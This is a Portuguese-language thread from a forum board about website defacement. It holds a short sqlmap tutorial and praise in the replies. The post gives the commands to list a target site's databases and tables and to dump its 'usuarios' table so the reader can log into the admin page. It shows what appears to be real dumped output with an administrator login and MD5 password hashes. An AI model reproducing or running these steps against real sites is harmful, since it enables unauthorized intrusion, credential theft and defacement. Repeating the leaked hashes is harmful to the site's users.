seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^

Você não está conectado. Conecte-se ou registre-se

 » Defacement » Tutorial / Dicas / Videos » [SQLMAP]

[SQLMAP]

Ver o tópico anterior Ver o tópico seguinte Ir em baixo  Mensagem [Página 1 de 1]

1 [SQLMAP] em Sex Ago 17, 2012 11:00 pm

Dr.{'script'}

avatar
postador
postador
- Boa noite Galera , tutorial pequeno .Mas bem pratico

-

root@bt:/pentest/database/sqlmap#

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u [Você precisa estar registrado e conectado para ver este link.] --dbs

depois desse comando vai mostrar todas as databases existentes . Segue o Exemplo

available databases [2]:
[*] information_schema
[*] databaseinformações

Depois que soubermos o nome da database . Vamos ao seguinte comando ...

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u [Você precisa estar registrado e conectado para ver este link.] -D databaseinformações --tables

Com este comando o sqlmap ira listar todas as tabelas dentro da database especificada no caso databaseinformações

segue o exemplo...

Database: databasinformações
[17 tables]
+-----------------------+
| `categoria-downloads` |
| `categoria-noticias` |
| agendas |
| banners |
| categorias |
| diretorios |
| downloads |
| fotos |
| fotos_noticias |
| galerias |
| membro_noticia |
| membros |
| namidia |
| noticias |
| press |
| usuarios |
| videos |
+-----------------------+

Qual tabela contem os arquivos que é de nosso interesse para podemos efetuar um login na pagina de admin ? USUARIOS ...

usaremos agora

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u [Você precisa estar registrado e conectado para ver este link.] -D databaseinformações -T usuarios --dump

com o comando --dump , o SQLMAP ira nos mostrar todas as informações que contem dentro da tabelas usuarios

segue o exemplo ...

+----+------+------+---------------------+------+------+------+------+------+------+------+----------------------------------+-------+-------+-------+----------+
| id | per9 | per5 | nome | per4 | per3 | per2 | per1 | per7 | per8 | per6 | senha | per12 | per11 | per10 | login |
+----+------+------+---------------------+------+------+------+------+------+------+------+----------------------------------+-------+-------+-------+----------+
| 1 | 1 | 1 | Administrador | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 54d0fc007ec9a2478249f97d1a6ea793 | 1 | 1 | 1 | admin |
| 2 | 0 | 0 | xxxxxxxxxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 74e4fe4936a69406effe6add85278531 | 0 | 0 | 0 | xxxxxx |
| 3 | 0 | 0 | xxxxxxxxxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | da96001f09f3728495e49e27b725ba45 | 0 | 0 | 0 | xxxxxxx |
| 4 | 0 | 0 | xxxxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | da96001f09f3728495e49e27b725ba45 | 0 | 0 | 0 | xxxxx |
| 5 | 0 | 0 | xxxxxx | 0 | 0 | 0 | 0 | 0 | 0 | 0 | d48ac0343f39bf54095c7cf8439617c9 | 0 | 0 | 0 | xxxxxx |
+----+------+------+---------------------+------+------+------+------+------+------+------+----------------------------------+-------+-------+-------+----------+

-

E isso ai ! + ?


_________________ASSINATURA_________________
[Você precisa estar registrado e conectado para ver esta imagem.]

2 Re: [SQLMAP] em Sab Ago 18, 2012 4:39 am

Kodo no Kami

avatar
master
master
muito show o tutorial mano *-*, ganho um +


_________________ASSINATURA_________________
[Você precisa estar registrado e conectado para ver esta imagem.]
[Você precisa estar registrado e conectado para ver esta imagem.]

Contato:
Spoiler:

Contato:
Facebook: [Você precisa estar registrado e conectado para ver este link.]
Skype: hackerfts315
http://endoffile.umforum.net

3 Re: [SQLMAP] em Sab Ago 18, 2012 8:26 am

Dr.{'script'}

avatar
postador
postador
*--* Vlw (:


_________________ASSINATURA_________________
[Você precisa estar registrado e conectado para ver esta imagem.]

Conteúdo patrocinado


Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo  Mensagem [Página 1 de 1]

Permissão deste fórum:
Você não pode responder aos tópicos neste fórum